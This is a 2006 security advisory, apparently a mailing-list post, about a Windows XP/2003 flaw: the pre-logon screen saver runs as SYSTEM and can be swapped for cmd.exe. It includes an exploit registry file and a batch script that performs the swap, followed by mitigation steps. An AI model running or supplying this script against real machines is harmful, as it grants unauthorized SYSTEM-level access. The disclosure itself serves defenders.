<<< Date Index >>>     <<< Thread Index >>>

Default Screen Saver Vulnerability in Microsoft Windows



-- Advisory Name --
Default Screen Saver Vulnerability in Microsoft Windows

-- Author --
Susam Pal

-- Vulnerable Systems --
Windows XP, Windows 2003 Server

-- Vulnerability Description --
This vulnerability has been tested on Windows XP and Windows 2003 Server. The 
screen saver in these systems is allowed to run even when a user hasn't logged 
in. To verify this one has to start windows and wait for the default screen 
saver to appear without logging in. The screen saver should appear after 10 
minutes because that is the default value of screen saver time-out.

Since no user logs in, this screen saver runs as a system process. The registry 
entries for this screen saver running as a system process can be found in the 
registry-key, "HKEY_USERS\.DEFAULT\Control Panel\Desktop". The following are 
the default values.

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="600"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="logon.scr"

It can be seen that the default time-out value is 600 seconds or 10 minutes.

An attacker can replace the default screen saver (logon.scr) with the command 
prompt (cmd.exe) and reduce the time-out period in a system by using a trojan 
or some other means. Later, the attacker can boot the system and wait for the 
screen saver to appear which is now the command prompt. Since the command 
prompt now runs as a system process, the attacker can perform critical 
operations including malicious ones. He may even execute "explorer.exe" to 
bring up the Windows GUI along with the desktop, start button, etc.

-- Exploit Reg File --
Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="60"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="logon.scr"

-- Exploit Script --
@echo off
rem ---------------------------------------------------------------------------
rem FileName:           DSSExploit.bat
rem Description:        This script replaces the default windows screensaver
rem                     with command prompt and configures the registry for
rem                     attack
rem Author:             Susam Pal
rem Date:               19th May, 2006
rem ---------------------------------------------------------------------------

rem kill logon.scr if its running
tasklist | find /i "logon.scr"
if %errorlevel% == 1 goto replace
taskkill /f /im "logon.scr"

:replace
rem replace
rename %SystemRoot%\System32\logon.scr logon.scr.bak
copy %ComSpec% %SystemRoot%\System32\logon.scr

rem update the registry keys for default screen saver
set DSSKEY="HKEY_USERS\.DEFAULT\Control Panel\Desktop"
reg add %DSSKEY% /v ScreenSaveActive /t REG_SZ /f /d 1
reg add %DSSKEY% /v ScreenSaverIsSecure /t REG_SZ /f /d 0
reg add %DSSKEY% /v ScreenSaveTimeOut /t REG_SZ /f /d 60
reg add %DSSKEY% /v SCRNSAVE.EXE /t REG_SZ /f /d logon.scr

-- Prevention --
One of the following preventive measures should be taken.

1. The users of the system should not run any program, script or software 
obtained from unreliable source as an administrator or any user which has the 
permission to modify the Windows Registry. 

2. Disable screen saver by executing the following command.

reg add "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /v ScreenSaveActive /t 
REG_SZ /f /d 0

Deny everyone all permissions on the registry key, "My 
Computer\HKEY_USERS\.DEFAULT\Control Panel\Desktop". This will prevent any 
malicious program, script or software from modifying the default screen saver 
settings. This can be done by the following steps.

a. Run "regedit.exe".
b. Locate the key, "HKEY_USERS\.DEFAULT\Control Panel\Desktop".
c. Right click on the key and select "Permissions".
d. Press "Add" button.
e. Press "Locations" button. 
f. If a login window appears, click "Cancel" button.
g. Select the local computer and press "Ok" button.
h. Enter "Everyone" in the text-area for object names and press "Ok" button.
8. Deny "Full Control" permission for "Everyone" and press "Ok" button.

3. Microsoft should release a patch which prevents the screen saver from 
running before a user logs in with proper authentication.

-- Disclaimer --
The information, codes and exploits in this advisory should be used for 
research, experimentation, bug-fixes and patch-releases only. The author shall 
not be liable in any event of any damages, incidental or consequential, in 
connection with, or arising out of this advisory.


-- Contact Information --
For more information, please contact:- 

Susam Pal
Infosys Technologies Ltd.
Survey No. 210, Manikonda Village
Lingampally, Rangareddy District
Hyderabad, PIN 500019
India
Phone No.: +91-9985259521
Email: susam.pal@xxxxxxxxx

http://susampal.blogspot.com/
http://securecoding.blogspot.com/